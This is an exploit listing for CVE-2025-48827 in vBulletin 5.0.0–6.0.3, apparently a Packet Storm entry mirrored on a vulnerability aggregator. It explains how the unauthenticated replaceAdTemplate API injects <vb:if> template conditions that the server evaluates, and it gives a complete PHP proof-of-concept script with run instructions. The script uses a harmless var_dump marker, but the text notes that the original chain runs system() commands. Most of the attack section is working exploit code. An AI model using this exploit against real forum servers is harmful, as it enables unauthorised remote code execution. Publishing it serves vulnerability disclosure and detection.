📄 vBulletin 6.0.3 replaceAdTemplate Expression Injection

🗓️ 26 Nov 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 123 Views

Unauthenticated injection in vBulletin replaces templates to enable server side execution via template conditions.

Reporter	Title	Published	Views	Family All 16
GithubExploit	Exploit for Improper Protection of Alternate Path in Vbulletin	31 May 202515:23	–	githubexploit
GithubExploit	Exploit for Improper Protection of Alternate Path in Vbulletin	14 Jul 202502:17	–	githubexploit
Circl	CVE-2025-48827	27 May 202504:47	–	circl
CNNVD	Internet Brands vBulletin 安全漏洞	27 May 202500:00	–	cnnvd
CVE	CVE-2025-48827	27 May 202500:00	–	cve
Cvelist	CVE-2025-48827	27 May 202500:00	–	cvelist
EUVD	EUVD-2025-28267	27 May 202500:00	–	euvd
Nuclei	vBulletin 5.0.0-6.0.3 - Authentication Bypass	3 Jun 202606:04	–	nuclei
Nuclei	vBulletin replaceAdTemplate - Remote Code Execution	2 Jun 202610:14	–	nuclei
NVD	CVE-2025-48827	27 May 202504:15	–	nvd

=============================================================================================================================================
    | # Title     : vBulletin 5.0.0 → 6.0.3 replaceAdTemplate Expression Injection                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.vbulletin.com/                                                                                                  |
    =============================================================================================================================================
    
    [+] Summary : 
    
    A design flaw in vBulletin's AJAX API (`ajax/api/ad/replaceAdTemplate`) allows
    unauthenticated attackers to inject arbitrary template conditions that execute
    server-side during rendering via `ajax/render/ad_<location>`.
    
    The original exploit chain enables remote command execution via `system()`
    wrapped inside template expressions. 
    
    The PoC evaluates a harmless PHP expression (`var_dump()`) inside a
    template and checks for execution by looking for a unique marker in the output.
    
    
    [+] References : ( https://packetstorm.news/files/id/200973/ 	CVE-2025-48827 ) 
    
    The flaw arises from:
    
    • Misuse of PHP Reflection in vBulletin's API dispatch.  
    • Missing access control for protected API methods.  
    • Template engine evaluating embedded PHP conditions inside `<vb:if>`.  
    • PHP 8.1+ behavior allowing direct invocation of protected methods.
    
    Two unauthenticated requests are used:
    
    1) Inject a custom ad template using `replaceAdTemplate`.  
    2) Trigger execution by calling `render/ad_<location>`.
    
    If the template condition executes, the response will contain a unique marker.
    
    
    --------------------------------------------------------------------
    ### SAFE PHP POC
    --------------------------------------------------------------------
    <?php
    /*
     * vBulletin replaceAdTemplate
     * by Indoushka — Packet Storm Edition
     */
    
    $target = "http://victim.com/"; // Change to target installation
    
    $marker   = substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"), 0, 6);
    $location = substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"), 0, 6);
    $param    = substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"), 0, 6);
    
    $condition = "\"var_dump('$marker')\"";
    $template  = "<vb:if condition='$condition'></vb:if>";
    
    /* ----------------------------
       1) Inject Template
       ---------------------------- */
    $post1 = [
        'routestring' => 'ajax/api/ad/replaceAdTemplate',
        'styleid'     => '1',
        'location'    => $location,
        'template'    => $template
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $inj_response = curl_exec($ch);
    curl_close($ch);
    
    echo "=== Injection Response ===\n";
    echo $inj_response . "\n\n";
    
    /* ----------------------------
       2) Trigger Execution
       ---------------------------- */
    $trigger_value = base64_encode($marker);
    
    $post2 = [
        'routestring' => "ajax/render/ad_$location",
        $param        => $trigger_value
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $render_response = curl_exec($ch);
    curl_close($ch);
    
    echo "=== Trigger Response ===\n";
    echo $render_response . "\n\n";
    
    if (strpos($render_response, $marker) !== false) {
        echo "[+] Vulnerable: Marker detected → Template executed.\n";
    } else {
        echo "[-] Not Vulnerable.\n";
    }
    ?>
    
    ------------------------------------------------------------------------------
    4. Save & Run Instructions
    ------------------------------------------------------------------------------
    
    Save the PoC as:
        vb_safe_poc.php
    
    Run it using:
        php vb_safe_poc.php
    
    If vulnerable, output includes:
        [+] Vulnerable: Marker detected …
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

26 Nov 2025 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 3.19.8 - 10

EPSS0.77631

SSVC